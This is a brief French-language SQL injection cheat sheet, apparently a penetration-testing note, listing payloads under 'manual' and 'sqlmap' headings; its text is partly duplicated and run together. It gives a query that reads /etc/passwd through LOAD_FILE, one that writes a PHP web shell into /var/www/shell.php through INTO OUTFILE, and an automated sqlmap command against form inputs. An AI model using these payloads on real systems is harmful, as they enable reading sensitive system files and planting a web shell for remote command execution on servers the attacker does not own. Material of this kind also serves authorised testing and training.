SQL Injection
Manuel
Lire un fichier
SELECT LOAD_FILE('/etc/passwd')Ecrire un fichier
SELECT 'system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'SQLmap
Full auto
sqlmap --forms --batch -u $URLSELECT LOAD_FILE('/etc/passwd')SELECT 'system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'sqlmap --forms --batch -u $URL